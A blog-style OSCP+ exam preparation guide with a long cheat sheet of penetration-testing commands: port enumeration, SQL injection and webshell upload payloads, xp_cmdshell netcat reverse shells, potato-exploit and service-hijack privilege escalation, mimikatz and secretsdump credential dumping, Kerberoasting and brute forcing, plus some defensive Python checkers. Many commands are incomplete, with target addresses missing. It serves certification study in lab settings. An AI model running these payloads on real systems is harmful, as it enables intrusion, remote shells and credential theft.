Muhammad Noman's OSCP+ Journey: A Comprehensive Review

The PEN-200 Course

PEN-200 is a hands-on, self-study pentesting course that aims to teach the mindset, skills, and tools needed to develop strong foundational pentesting skills for InfoSec professionals.

The OSCP+ Certification Exam

The exam is a practical hands-on assessment that tests the student's ability to gain unauthorised access to multiple presented systems within a given time limit. The current structure of the proctored exam is as follows.

  • Practical exam time: 24 hours.
  • Exploit up to 6 hosts, gaining at least 70 out of 100 points.
  • 3 standalone hosts, each worth 20 points (10 points for user-level access, 10 points for system/root-level access).
  • 1 Active Directory set worth 40 points (2 clients, 1 Domain Controller): Machine 01 (10 marks) | Machine 02 (10 marks) | DC 01 (20 marks).
  • Exam reporting time: 24 hours.

Students must submit a report within 24 hours of the practical assessment detailing all exploitation techniques used during the exam. An incomplete write-up will result in 0 points for any associated hosts.

My path to OSCP+

I have extensive experience as a web penetration tester and am already OSCP certified. For me, cracking OSCP+ wasn't too challenging. However, if you're not familiar with penetration testing concepts or haven't achieved OSCP+ certification yet, I recommend following this path to build a solid foundation. I started with the eJPT certification and course content from INE. I learned a lot, and then I moved on to OffSec's official content, using the TJNull list to solve a few machines. For the rest, I walked through them, noting down everything: how to gain initial access and how to perform privilege escalation. As for Active Directory, I learned from OffSec's content; you can find further details in the Active Directory section of this article. I recommend one of two paths:

  • eJPT, then OSCP+; or

  • eJPT, then (CEH(P), eCPPTv2, PNPT, eWPTX), and lastly OSCP+.


1. Initial access: work on eJPT, this article, and the official content.

2. Windows privilege escalation: use TCM Security, the official content, and YouTube videos.

3. Linux privilege escalation: TCM Linux, the official content, and YouTube videos.

4. Active Directory: the official content, this article, and further searching.

LABS Platforms

One of the best choices for a lab is the TJNull list, which includes machines from Hack The Box, TryHackMe, Proving Grounds (Practice), and the official OffSec labs (Play).

When you buy the OSCP+, you receive a 3-month subscription that includes different labs, namely Secura, OSCP A, OSCP B, OSCP C, Relia, Medtech, and Skylark, totaling 66 labs. There are different approaches to solving these machines. I began with OSCP A, B, and C and then proceeded to Medtech, Relia, Skylark, and Secura. They currently have two additional labs, Zeus and Poseidon, which are not included in the OSCP+ curriculum. However, if you want to gain hands-on experience and prepare effectively for OSCP+, these labs can provide significant benefits.

Recommendation for OSCP+

I have divided the content into four sections with the following headings:

1. Initial Access with Different Ports


  • If you find credentials, try them on ports 21, 22, 3389, web login pages (HTTP listening ports), port 161 (evil-winrm), and databases.
  • Try a high-access approach first, targeting services that give elevated rights such as RDP and SSH.
  • Always check the /.ssh/ directory for RSA and authorized keys.


  • autorecon <ip> (best tool; it runs both UDP and TCP scans, so you do not need separate -sU/-sT scans)
  • nmap -A -Pn <ip> (best Nmap command for initial access)
  • nmap -sC -sV -A -T4 -Pn -oN 101.nmap (always check the version of each service, e.g. vsftp 3.02 is exploitable; search Google or searchsploit)
  • Windows: Test-NetConnection -Port 445 (check whether 445 is open); to check ports 1 to 1024: 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("", $_)) "TCP port $_ is open"} 2>$null
  • For a specific port: nmap -sC -A -p21 <ip>

Port 21 FTP:

If you have a username and password for this service, you can upload a shell to a directory or download files that help with initial access.

  • nmap --script=ftp-* -p 21 $ip (scan the FTP port completely)
  • Check whether anonymous login is allowed, then use ftp anonymous@ip (the password is also anonymous)
  • If ls/dir does not work, run the passive command to switch between active and passive mode.
  • mget * (download everything from the current directory, e.g. zip, pdf, doc)
  • send/put (send a single file or upload a shell)
  • After downloading files, always run exiftool -u -a <filename> (the metadata may reveal usernames)
  • FTP versions above 3.0 are not exploitable

Port 22 SSH:

  • You can't get initial access directly; however, you can log in with a username and password or with a private key.
  • ssh noman@ip
  • ssh -p 2222 [email protected] (ssh on a different port)
  • curl https://<ip>/index.php?page=../../../../../../../../../home/noman/.ssh/id_rsa
  • chmod 600 id_rsa and then ssh -i id_rsa -p 2222 noman@ip
  • user/.ssh/authorized_keys

PORT 25 (relaying, server to server), 465 (mail client to server)

  • You can send a phishing email through this port to get a reverse shell.
  • Used to send, receive, and relay outgoing emails; the main attacks are user enumeration and using an open relay to send spam.
  • nmap --script=smtp* -p 25
  • Always try logging in with telnet <ip> 25

Port 53 DNS:

General enumeration of a domain to find hostnames, subdomains, etc.

  • nslookup <ip> | dig <ip> | host <ip> | host -t ns $ip | subdomains, host, ip | dnsenum

Port 80 , 8080, 443:

When executing Nmap, you may discover HTTP ports like 80, 81, 8080, 8000, 443, etc. There's a possibility of finding four HTTP ports on one machine.

In the very first step, run Nmap with an aggressive scan on all ports:

nmap -sC -sV -A -T4 -Pn -p80,81,8000,8080,443

Simply copy the version name of the website and search on Google to find an exploit.

Furthermore, Nmap may reveal files such as robots.txt, index.html, index.php, login.php, cgi-sys, cgi-mod, and cgi-bin.

If you encounter a host error, find a hostname via port 53 or discover a name in the website source code, footer, contact page, etc.

Then add the discovered domain to the /etc/hosts file to access the site.

Content Discovery:

  • gobuster dir -u -w /wd/directory-list-2.3-big.txt (simple run)
  • gobuster dir -u -w /wd/directory-list-2.3-big.txt (with a different port)
  • gobuster dir -u -w /wd/directory-list-2.3-big.txt (if you find noman, then enumerate the noman directory)
  • With the help of content discovery, you will find hidden directories, CMS web logins, files, etc. This is a crucial step in OSCP+.
  • Utilizing content discovery and Nmap, you can identify a CMS, static pages, dynamic websites, and important files like databases, .txt, .pdf, etc. Additionally, you can enumerate websites with automated tools such as WPScan, JoomScan, and Burp Suite, and uncover web vulnerabilities like RCE, SQLi, upload functionality, XSS, etc.
  • If you find any CMS like WordPress, Joomla, etc., simply search on Google for default credentials or exploits for its themes, plugins, or version. In the case of a login page, you can exploit SQL injection or launch a brute-force attack with Hydra. If you identify a CMS, scan it with tools, enumerate it with brute force, check default usernames and passwords, explore theme, plugin, and version exploits, and search on Google. Alternatively, you can discover web vulnerabilities to gain initial access.


  • wpscan --url --enumerate u
  • wpscan --url -e vp --plugins-detection mixed --api-token API_TOKEN
  • wpscan --url -e u --passwords /usr/share/wordlists/rockyou.txt
  • wpscan --url -U admin -P /usr/share/wordlists/rockyou.txt


Adobe ColdFusion


  • Google the vulnerabilities.
  • Default login is admin:admin at /vtigercrm/
  • Able to upload a shell as the profile photo


  • Admin page: /administrator
  • Configuration files: configuration.php | diagnostics.php


  • Config files >> configuration.php

Login page

  • Try common credentials such as admin/admin, admin/password and falafel/falafel.
  • Determine if you can enumerate usernames based on a verbose error message.
  • Manually test for SQL injection. If it requires a more complex SQL injection, run SQLMap on it.
  • If all fails, run hydra to brute force credentials.
  • View source code
  • Use default password
  • Brute force directories first (sometimes you don't need to log in to pwn the machine)
  • Search credential by bruteforce directory
  • bruteforce credential
  • Search credential in other service port
  • Enumeration for the credential
  • Register first
  • SQL injection
  • XSS can be used to get the admin cookie
  • Bruteforce session cookie

Web Vulnerability:


  • Pentestmonkey cheatsheet
  • Try admin'# (valid username; see the Netsparker SQLi cheatsheet)
  • Try abcd' or 1=1;--
  • Use UNION SELECT null,null,... instead of 1,2,... to avoid type conversion errors
  • For MSSQL:
  • xp_cmdshell
  • Use concat to list the data of 2 or more columns in one
  • For MySQL:
  • try a' or 1='1 -- -
  • A' union select "" into outfile "C:\xampp\htdocs\run.php" -- -'
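The payloads above work only because the application splices the submitted text into its SQL string. The Python snippet below is added here as an illustration and is not code from the original article: it puts that splice next to the parameterized query that fixes it. The users table and the credentials in it are constructed sample data, and SQLite stands in for MySQL (the `-- -` comment sequence behaves the same way in both).

```python
import sqlite3

# Constructed sample accounts for the demo; not data from any real system.
SAMPLE_USERS = [("admin", "S3cret!"), ("noman", "Noman@123")]


def make_db():
    """Build an in-memory users table holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Splices the submitted text straight into the SQL, so it is parsed as SQL.

    With username  a' or 1=1 -- -  the WHERE clause becomes
        username = 'a' or 1=1 -- -' AND password = '...'
    and everything after '--' is a comment, so the password check disappears.
    """
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened form: the driver sends the values separately from the SQL text,
    so quotes and comment sequences in the input remain literal data."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    """Return (vulnerable_bypassed, parameterized_bypassed) for one bypass payload."""
    conn = make_db()
    payload = "a' or 1=1 -- -"  # same shape as the page's MySQL payload
    return (
        login_vulnerable(conn, payload, "not-the-password"),
        login_parameterized(conn, payload, "not-the-password"),
    )


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print(f"string-built query bypassed: {vulnerable}")  # True
    print(f"parameterized query bypassed: {hardened}")   # False
```

The parameterized version is the whole fix: no escaping or filtering of quote characters is involved, which is why it also survives the UNION and `into outfile` variants listed above.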

File Upload:

  • Change the MIME type
  • Add image headers
  • Add the payload in an exiftool comment and name the file file.php.png
  • ExifTool steps: 1. <?php system($_GET['cmd']); ?> (shell.php) 2. exiftool "-comment<=shell.php" malicious.png 3. strings malicious.png | grep system
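Each trick in the list above defeats one naive check: a client-supplied MIME type, a missing magic number, or an extension filter that only looks at the last suffix. The following Python validator is an added example, not code from the article, showing the server-side checks that close all three at once; the PNG bytes it tests against are constructed in the script rather than taken from real files.

```python
import os
import secrets

# Allowed image types: final extension -> accepted leading bytes (magic numbers).
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Script markers that never belong inside an image, metadata fields included.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")

# Constructed sample uploads (not real files): a minimal PNG header plus padding,
# and the same header with a PHP tag planted where a comment chunk would sit.
GOOD_PNG = MAGIC["png"][0] + b"\x00" * 16
PNG_WITH_PHP_COMMENT = MAGIC["png"][0] + b"tEXtComment\x00<?php echo 1; ?>"


def validate_upload(filename, data):
    """Return (accepted, detail): detail is the rejection reason or the storage name.

    Checks, in order:
      1. exactly one extension and it is on the allow list (rejects shell.php.png);
      2. the bytes start with that type's magic number; the client-supplied MIME
         type is ignored entirely because the client chooses it;
      3. no script marker anywhere in the file, which catches payloads written
         into EXIF or comment fields.
    A random storage name is returned so the client-chosen name never reaches disk.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "filename must be name.ext with a single extension"
    ext = parts[1]
    if ext not in MAGIC:
        return False, f"extension .{ext} not allowed"
    if not data.startswith(MAGIC[ext]):
        return False, f"content does not match a .{ext} image"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "embedded script marker found"
    return True, f"{secrets.token_hex(16)}.{ext}"


def demo():
    """Run the constructed cases; returns {filename: accepted}."""
    cases = {
        "photo.png": GOOD_PNG,
        "shell.php.png": GOOD_PNG,
        "shell.php": b"<?php echo 1; ?>",
        "fake.png": b"<?php echo 1; ?>",
        "malicious.png": PNG_WITH_PHP_COMMENT,
    }
    return {name: validate_upload(name, data)[0] for name, data in cases.items()}


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:16} accepted={accepted}")
```

The marker scan is defence in depth only; the check that makes the exiftool trick harmless is storing uploads under a random name in a directory the web server will not execute, so that a PHP tag inside a genuine image is just bytes.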

Use automated tools

  • nikto: nikto -h $ip | nikto -h $ip -p 80,8080,1234 (test different ports in one scan)


Download .git

  • Extract .git content
  • mkdir <EXTRACT_FOLDER>


SSL Enumeration

  • Open a connection: openssl s_client -connect $ip:443

Port 161 UDP:

SNMP can give you a username, a password, or another hint for logging in.

  • AutoRecon picks this up (UDP port)
  • nmap -sU -p161 --script "snmp-*" $ip
  • nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat IP
  • snmpwalk -v 1 -c public NET-SNMP-EXTEND-MIB::nsExtendOutputFull (this is the command I used on two or three machines to find a username, a password, or a hint)
  • evil-winrm -i -u 'noman' -p 'nomanpassword' (log in with this command)

PORT 139, PORT 445 (also PORT 137 (name service) and PORT 138 (datagram), UDP NetBIOS)

Always check guest login, then check public shares with write and execute permission; you may find credentials, files (pdf, ps1), etc.

  • nmap -v --script smb-vuln* -p 139,445
  • smbmap -H (public shares; check read, write and execute)
  • smbmap -H -R tmp (check a specific folder such as tmp)
  • enum4linux -a (best command to find details and the user list)
  • smbclient -p 4455 -L // -U noman --password=noman1234
  • smbclient -p 4455 // -U noman --password noman1234 (login)

Port 3389 RDP

There are two methods for this port: one involves finding credentials via another port, and the other employs brute force.

  • The only way to find credentials on this port itself is a brute-force attack using Hydra
  • hydra -t 4 -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
  • Then log in with xfreerdp
  • xfreerdp /v: /u:noman /p:passwordnoman /workarea /smart-sizing
  • rdesktop $ip


Port 3306 MySQL: find credentials via another port and use the defaults to log in

  • nmap -sV -Pn -vv --script=mysql* $ip -p 3306
  • mysql -u root -p'root' -h -P 3306
  • select version(); | show databases; | use <database>; | select * from users; | show tables; | select system_user(); | SELECT user, authentication_string FROM mysql.user WHERE user = Pre

MSSQL 1433, 4022, 135, 1434, UDP 1434

For this port, you can find credentials via another port and log in with impacket-mssqlclient.

  • nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password $ip
  • impacket-mssqlclient noman:'Noman@321@1!'@
  • impacket-mssqlclient Administrator:'Noman@321@1!'@ -windows-auth
  • SELECT @@version; | SELECT name FROM sys.databases; | SELECT * FROM offsec.information_schema.tables; | select * from offsec.dbo.users;

Run OS commands through the database (xp_cmdshell)

  • SQL> EXECUTE sp_configure 'show advanced options', 1;
  • SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
  • EXEC xp_cmdshell 'whoami';
  • exec xp_cmdshell 'cmd /c powershell -c "curl -o \windows\temp\nc.exe"';
  • exec xp_cmdshell 'cmd /c dir \windows\temp';
  • exec xp_cmdshell 'cmd /c "\windows\temp\nc.exe 443 -e cmd"';
  • The same applies when you get in through an SQL injection login

PORT 5437 & PORT 5432 PostgreSQL

  • If you find this port, follow the commands below; you can also easily find credentials via another port
  • 5437/tcp open postgresql PostgreSQL DB 11.3 - 11.7
  • msf6 exploit(linux/postgres/postgres_payload) > options, then set all values: RHOST, LHOST (tun0), port
  • OR | psql -U postgres -p 5437 -h IP | select pg_ls_dir('./'); | select pg_read_file('/etc/passwd'); | select pg_ls_dir('/home/wilson'); | select pg_read_file('/home/wilson/local.txt');

2. Windows Privilege Escalation

I have used this approach:

  • Run whoami /all (if SeImpersonatePrivilege is enabled, use PrintSpoofer or GodPotato).

  • Simply run PowerUp, then look for privileges on unquoted paths, DLLs, etc.

  • Upload WinPEAS for further enumeration if the above does not work. WinPEAS mostly finds plaintext passwords.

  • Lastly, find any executable (exe), PowerShell script (ps1), or PDF file that is running. Run it for further enumeration and search on Google for additional details.


  • certutil.exe -urlcache -split -f (only runs in cmd)

  • iwr -uri -OutFile PowerUp.ps1 (PowerShell)

  • curl -OutFile PowerUp.ps1 (both)

  • Start an HTTP server with python3 -m http.server 80 (or 81, etc.)

Plaintext Password

  • Folder names: C: folder | Documents folder

  • To find a password:

  • run winpeas

  • check the history with the command

  • check exe files in C: or on the desktop, etc.

  • \users\noman\documents\fileMonitorBackup.log

File Permission

F > full access | M > modify access | RX > read and execute access | R > read-only access | W > write-only access

  • icacls "C:\xampp\apache\bin\fida.exe" (check permissions)
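When auditing a host, the question behind the icacls output is simple: does a principal that every standard user belongs to hold F, M or W on a binary that runs with higher privileges? The Python script below is an added example (not part of the article) that parses the text icacls prints for one file and flags exactly those entries; the sample output it parses is constructed to match the icacls format and is not from a real system.

```python
import re

# icacls codes from the legend above, split by whether they allow changing the file.
# Inheritance flags such as (I), (OI) and (CI) are ignored.
WRITE_CAPABLE = {"F": "full", "M": "modify", "W": "write"}

# Principals that every interactive or authenticated user belongs to.
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}

# Constructed sample: the shape icacls prints for a single file.
SAMPLE_PATH = r"C:\xampp\apache\bin\fida.exe"
SAMPLE_OUTPUT = r"""C:\xampp\apache\bin\fida.exe BUILTIN\Users:(I)(F)
                             NT AUTHORITY\SYSTEM:(I)(F)
                             BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""


def parse_icacls(path, output):
    """Parse icacls output for one file into a list of (principal, [codes]).

    icacls prints the path on the first line followed by the first ACE, then one
    indented ACE per line and a summary line. The path is removed by name rather
    than by splitting on spaces because Windows paths often contain spaces.
    """
    entries = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):
            line = line[len(path):].strip()
        if ":" not in line:
            continue
        principal, _, perms = line.rpartition(":")
        groups = re.findall(r"\(([A-Z,]+)\)", perms)
        codes = [code for group in groups for code in group.split(",")]
        entries.append((principal, codes))
    return entries


def weak_entries(entries):
    """Return (principal, [rights]) for ACEs giving low-privilege users write access."""
    weak = []
    for principal, codes in entries:
        if principal in LOW_PRIV_PRINCIPALS:
            rights = [WRITE_CAPABLE[c] for c in codes if c in WRITE_CAPABLE]
            if rights:
                weak.append((principal, rights))
    return weak


def audit(path, output):
    """Convenience wrapper: parse then report the weak ACEs for one file."""
    return weak_entries(parse_icacls(path, output))


if __name__ == "__main__":
    for principal, rights in audit(SAMPLE_PATH, SAMPLE_OUTPUT):
        print(f"{SAMPLE_PATH}: {principal} has {', '.join(rights)} access")
```

On a real host, run `icacls <file>` and feed the captured text to `audit`; any result means the file's ACL should be tightened to SYSTEM and Administrators before it is allowed to run as a service or scheduled task.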

Automated Tools


winPEAS.exe (everything, including plaintext passwords)

Manual Enumeration

  • systeminfo OR systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

  • hostname | whoami | wmic qfe (updates, patches, etc.)

  • wmic logicaldisk (drives)

  • echo %USERNAME% or whoami (cmd), then $env:username (PowerShell)

  • net user | net user noman

  • net localgroup | net localgroup noman

  • netsh firewall show state (firewall)

  • whoami /priv

  • ipconfig | ipconfig /all

  • netstat -ano | route print

  • PowerShell: Get-LocalUser | Get-LocalGroup | Get-LocalGroupMember Administrators

  • Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname (check installed 32-bit software and versions; the next command covers 64-bit)

  • Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

  • Get-Process

  • If RDP is enabled, or we enable it, then add this:

  • net localgroup administrators /add

  • Unattended Windows installation (old files with usernames and passwords, then crack them)

  • dir /s sysprep.inf sysprep.xml unattended.xml unattend.xml *unattended.txt 2>nul

GoldMine Password/plaintext

  • 1st technique (common passwords)
  • Readable locations |
  • findstr /si password *.txt *.xml *.ini
  • Registry (if VNC is installed)
  • reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (autologin)
  • Configuration files with winpeas
  • SAM | winpeas (looking for common SAM and SYSTEM backups)
  • Move them to the attacker machine, then decrypt with creddump-master
  • OR
  • Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue (find KeePass database files)
  • Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue (check files) | type C:\xampp\passwords.txt | type C:\xampp\mysql\bin\my.ini
  • Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue (check doc, txt, etc.)
  • Another goldmine is the PowerShell history: Get-History | (Get-PSReadlineOption).HistorySavePath (if you find the file, type noman.txt; if you find a command in it, run it, because it may lead to root)
  • cd C:\ | pwd | dir

SeImpersonatePrivilege enabled

whoami /priv and whoami /all


  • curl -o Pr.exe
  • .\Pr.exe -i -c cmd OR .\PrintSpoofer32.exe -i -c powershell.exe


  • curl -o god.exe
  • .\god.exe -cmd "cmd /c whoami" OR
  • curl -o nc.exe
  • .\god.exe -cmd "cmd /c C:\xampp\htdocs\cms\files\nc.exe 443 -e cmd"
  • .\god.exe -cmd "cmd /c C:\xampp\htdocs\cms\files\nc.exe 443 -e powershell"

Kernel Exploits

  • BinPath modifiable service


  • Check permissions and whether the service can be stopped/started

  • Create a shell with msfvenom and upload it (curl, iwr, certutil)

  • icacls "C:\Program Files"

  • msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f exe -o rev.exe

  • del "C:\program files\noman\noman.exe"

  • curl -o noman.exe

  • cp noman.exe "C:\program files\noman\"

  • net start noman

Unquoted path

  • Get-UnquotedService

  • Check permissions and whether the service can be stopped/started

  • Create a shell with msfvenom and upload it (curl, iwr, certutil)

  • icacls "C:\Program Files"

  • msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f exe -o rev.exe

  • del "C:\program files\noman\noman.exe"

  • curl -o noman.exe

  • cp noman.exe "C:\program files\noman\"

  • net start noman
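Get-UnquotedService flags a service when its unquoted path contains spaces and a directory that Windows tries before the real binary is writable by a standard user. The following Python script is an added example, not code from the article or from PowerUp, that reproduces that audit logic so the condition is explicit: it lists the candidate executables Windows would try for a given ImagePath and reports a misconfiguration when one of the earlier candidates lands in a writable directory. The ImagePath values and the writable directories are constructed inputs; on a real host the writable set comes from icacls, and the fix is quoting the path in the service configuration.

```python
import ntpath

# Constructed sample: directories on the imaginary host that a standard user
# can write to. On a real host you would establish this list with icacls.
SAMPLE_WRITABLE_DIRS = [r"C:\Program Files\noman app", r"C:\Temp"]


def search_candidates(image_path):
    """Return, in order, the executables Windows would try for a service ImagePath.

    Only the text up to and including '.exe' is examined, so trailing service
    arguments are ignored. A quoted path has exactly one candidate. For an
    unquoted path with spaces, each space is a point where the path could end,
    and the text before it (plus '.exe') is tried before the intended binary.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return [path.split('"')[1]]
    exe_at = path.lower().find(".exe")
    if exe_at != -1:
        path = path[: exe_at + 4]
    candidates = [path[:i] + ".exe" for i, ch in enumerate(path) if ch == " "]
    candidates.append(path)
    return candidates


def is_misconfigured(image_path, writable_dirs):
    """True when a candidate tried before the real binary sits in a writable directory.

    That is the condition that turns an unquoted service path into a privilege
    escalation risk; quoting the path removes every candidate but the last.
    """
    writable = {ntpath.normcase(d.rstrip("\\")) for d in writable_dirs}
    for candidate in search_candidates(image_path)[:-1]:
        parent = ntpath.normcase(ntpath.dirname(candidate).rstrip("\\"))
        if parent in writable:
            return True
    return False


def audit_services(services, writable_dirs):
    """Return the names of services whose ImagePath is exploitable as configured."""
    return [name for name, path in services.items()
            if is_misconfigured(path, writable_dirs)]


if __name__ == "__main__":
    # Constructed sample service table: name -> ImagePath as the registry would store it.
    sample_services = {
        "noman": r"C:\Program Files\noman app\noman.exe",
        "quoted": r'"C:\Program Files\noman app\noman.exe" -k svc',
        "nospace": r"C:\Windows\svc.exe",
    }
    for name, path in sample_services.items():
        print(name, "->", search_candidates(path))
    print("misconfigured:", audit_services(sample_services, [r"C:\Program Files"]))
```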

DLL Hijacking

  • Check permissions and whether the service can be stopped/started

  • Create a shell with msfvenom and upload it (curl, iwr, certutil)

  • icacls "C:\Program Files"

  • msfvenom -p windows/shell_reverse_tcp lhost= lport=443 -f dll -o rev.dll

  • del "C:\program files\noman\noman.dll"

  • curl -o noman.dll

  • cp noman.dll "C:\program files\noman\"

  • net start noman

Task Scheduler / cron job

  • schtasks /query /fo LIST /v (find the task name, e.g. \Microsoft\CacheCleanup)

  • icacls C:\Users\noman\Pictures\Cleanup.exe (the user needs (I)(F) permission)

  • iwr -Uri -OutFile Cleanup.exe

  • move .\Pictures\BackendCacheCleanup.exe Cleanup.exe.bak

  • move .\Cleanup.exe .\Pictures\ (put the file in place just before the scheduled run and wait for it to execute)

3. Linux Privilege Escalation

  • Start with automated tools like LinPEAS, then proceed with manual enumeration. The following command gets a TTY shell:
  • python3 -c 'import pty; pty.spawn(["/bin/bash", "--rcfile", "/etc/bash.bashrc"])' --> full shell

Automated Tools

  • python -m http.server 80

  • wget -O

  • chmod +x | ./ | ( ./ | tee filename.txt )

Manual Enumeration

  • Approach: permission checks / cron jobs
  • ls -la /etc/passwd | ls -la /etc/shadow -> check read/write permissions | sudo su
  • sudo -l
  • find / -user root -perm -4000 -print 2>/dev/null
  • getcap -r / 2>/dev/null (capabilities, e.g. cap_setuid+ep)
  • find / -perm -u=s -type f 2>/dev/null
  • find / -type f -perm 0777 2>/dev/null | find / -writable -type d 2>/dev/null
  • cat /etc/crontab (normal) | grep "CRON" /var/log/syslog (wildcards)
  • history | cat .bashrc
  • Goldmine passwords/plaintext
  • Backup files
  • Kernel: search with Google

4. Active Directory

Active Directory is challenging for everyone. With the provided credentials, simply run an Nmap scan to enumerate services and open ports, and use the results to decide where to apply the credentials based on the identified services. There are three machines: Machine01, Machine02, and Domain01. Machine01 always begins with initial access and privilege escalation as a standalone. Use the following steps to work on Active Directory:

1. Run net user /domain.

2. List users and run SharpHound.ps1 to find domain users (otherwise they are not in the user list), and also follow the steps below.

3. Run secretsdump, and if you come from a reverse shell, change the administrator password.

4. For tunneling (use Chisel or SSH); if there is an issue, revert the machine.

5. Find users and passwords from secretsdump, mimikatz, the C: drive, config files, winpeas, etc.

6. Check services with open ports such as 22, 1433, 5896, 5895, 445, etc.

7. Use CrackMapExec with the user and password, testing against the above services.

8. Perform AS-REP Roasting with or Rubeus.exe.

9. If SQL, use; if SMB, use; if WinRM or evil-winrm, check the administrator, then move to the next step to find the Windows root.

10. For Domain01:

11. Run secretsdump (default administrator) with user/pass or hash; the same with psexec, winrm, SSH, etc.

12. Directly rooted.


After privilege escalation, run the following commands:

  • Transfer SharpHound.ps1 to the target and load it in PowerShell:

  • . .\SharpHound.ps1

  • Invoke-BloodHound -CollectionMethod All

  • Find user accounts on domain01 (if you find a user, skip the steps below)

  • Transfer to Kali

  • Create a new user (if you want, or change the administrator password)

  • net user noman Noman@321 /add

  • net localgroup administrators noman /add

  • net user administrator Noman@123 (changes the administrator's password)

  • Run secretsdump or use mimikatz to find users and passwords on machine01

  • Use impacket for secretsdump

  • python3 ./ ./administrator:Noman@[email protected] (check domain users with noman.domain, especially default usernames and passwords)

  • For mimikatz: privilege::debug | token::elevate | sekurlsa::logonpasswords


The first step is to start port forwarding, followed by running AS-REP Roasting with for Linux and Rubeus.exe for Windows. If neither method works, manually enumerate in Windows to find the username and password, or use mimikatz again. If you are not an administrator, apply Windows privilege escalation techniques. This will help you gain privileges on Machine02.

  • Run nmap on Machine02 through proxychains: proxychains nmap -sT -sU -p22,161,135,139,445,88,3389

Port forward with SSH (if port 22 is open on machine01)

  • ssh -D 8001 -C -q -N [email protected]

  • In /etc/proxychains4.conf (add 9999)

  • socks5 8001

Port forward with chisel

  • socks5 1080: add this in /etc/proxychains

  • ./chisel server -p 5555 --reverse

  • certutil -urlcache -split -f

  • chisel client R:socks

  • This is the best article for chisel installation


Kerberoasting from Windows on Machine02

  • .\Rubeus.exe kerberoast /outfile:hashes.kerberoast

  • sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force


AS-REP Roasting with ./ for Machine02

  • (make sure the firewall is off and you are a local admin, etc.)

  • proxychains impacket-GetNPUsers noman.domain/noman:Noman@123 -dc-ip

  • sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

If SQL, use; if SMB, use; if WinRM or evil-winrm, check the administrator, then move to the next step to find the Windows root. If you find a lot of usernames and passwords, use CrackMapExec for SMB, SQL, WinRM or evil-winrm.


  • Run nmap on Domain01 through proxychains: proxychains nmap -sT -sU -p22,161,445,88,3389

  • Check the nmap results for login services and use CrackMapExec. If you don't want to use nmap, then

  • simply log in with psexec, winrm or winexe

  • If you can't find the username and password, use different methods like pass-the-hash or a silver ticket

General information

Reverse Shell

  • Always copy the reverse shell from these links and test it directly. If it doesn't work, URL-encode it or encode it with base64.



Password cracking:

  • admin:admin admin:password root:root root:toor
  • Burp Suite if we want to
  • john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt
  • sudo gzip -d rockyou.txt.gz
  • hydra -l noman -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://
  • hydra -l noman -P /usr/share/wordlists/rockyou.txt http-post
  • hydra -l user -P /usr/share/wordlists/rockyou.txt http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
  • hashcat -b | hashcat.exe -b (Linux and Windows benchmark)
  • Customize wordlists:
  • head /usr/share/wordlists/rockyou.txt > demo.txt | sed -i '/^1/d' demo.txt
  • If we want to append 1 to every password: echo \$1 > demo.rule | hashcat -r demo.rule --stdout demo.txt
  • hash-identifier (identify a simple hash)
  • hashid (if an identifier is present, e.g. "$2y$10$")
  • ssh2john id_rsa > ssh.hash | hashcat -h | grep -i "ssh" (port 22)

CRACK NTLM with MimiKatz

  • Target Windows: Get-LocalUser | open PowerShell | cd C:\tools | ls (mimikatz is already installed; if not, install it) | token::elevate (check user permissions) | lsadump::sam (dump all users' NTLM hashes)
  • Kali: vim noman.hash (paste noman's hash) | hashcat --help | grep -i "ntlm" (check the mode, e.g. NTLM is 1000) | hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Zip cracking

